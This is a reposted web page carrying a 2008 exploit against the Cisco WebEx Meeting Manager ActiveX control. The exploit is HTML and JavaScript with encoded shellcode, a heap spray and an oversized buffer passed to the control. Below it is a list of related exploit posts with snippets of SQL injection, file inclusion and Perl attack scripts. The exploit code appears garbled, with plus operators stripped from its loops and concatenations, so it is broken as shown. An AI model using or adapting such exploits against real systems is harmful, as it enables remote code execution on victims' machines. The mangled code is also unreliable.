Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit

转载   佚名   2008-10-08   浏览量:588


<html>
<body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target />
</object> <script language=javascript> // k`sOSe 08/08/2008
// tested in IE6, XP SP1
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100"); var block = unescape("%u0909%u0909");
while (block.length < 0x25000) block = block; var memory = new Array(); var i=0;
for (;i<1000;i ) memory[i] = block shellcode; memory[i] = shellcode; var buf2;
for (var i=0; i<151; i ) buf2 = "X"; buf2 = unescape(" "); target.NewObject(buf2); </script> </body>
</html>

转载自://www.jb51.net/hack/5758.html

招聘 不方便扫码就复制添加关注:程序员招聘谷,微信号:jobs1024



Wysi Wiki Wyg 1.0 (index.php c) Local File Inclusion Vulnerability
--== ========================================================= ==-- --== Wizi Wiki Wig Local File Inclusion Vulnerability ==-- --== ========================================================= ==-- [*] Discovered By: StAkeR ~ [email protected]
DreamNews Manager (id) Remote SQL Injection Vulnerability
######################################################### # # dreamnews ( rss) Remote SQL Injection Vulnerability #======================================================== # Author: Hussin X = #
phpDatingClub (website.php page) Local File Inclusion Vulnerability
######################################################### # # phpDatingClub Local File Include Vulnerability #======================================================== # = # Author: Big Ben
gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability
###################################################################################################### gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulnerability ###############################################################################
Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
<html> <body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target /> </object> <script language=javascript> // k`sOSe 08/08/2008 // tested in IE6, XP SP1 var shellcode = unescape("
Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit
<?php /* . vuln.: Quicksilver Forums 1.4.1 (forums[]) Remote SQL Injection Exploit . download: //www.quicksilverforums.com/ . . author: irk4z[at]yahoo.pl . homepage: //irk4z.wordpress.com/ . . greets: all friends ;) .
Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC
var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="'; var body1='"></OBJECT>'; var buf='';
MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " n"; print " #################### Viva IslaMe Viva IslaMe #############
MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " n"; print " #################### Viva IslaMe Viva IslaMe #############
MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " n"; print " #################### Viva IslaMe Viva IslaMe #############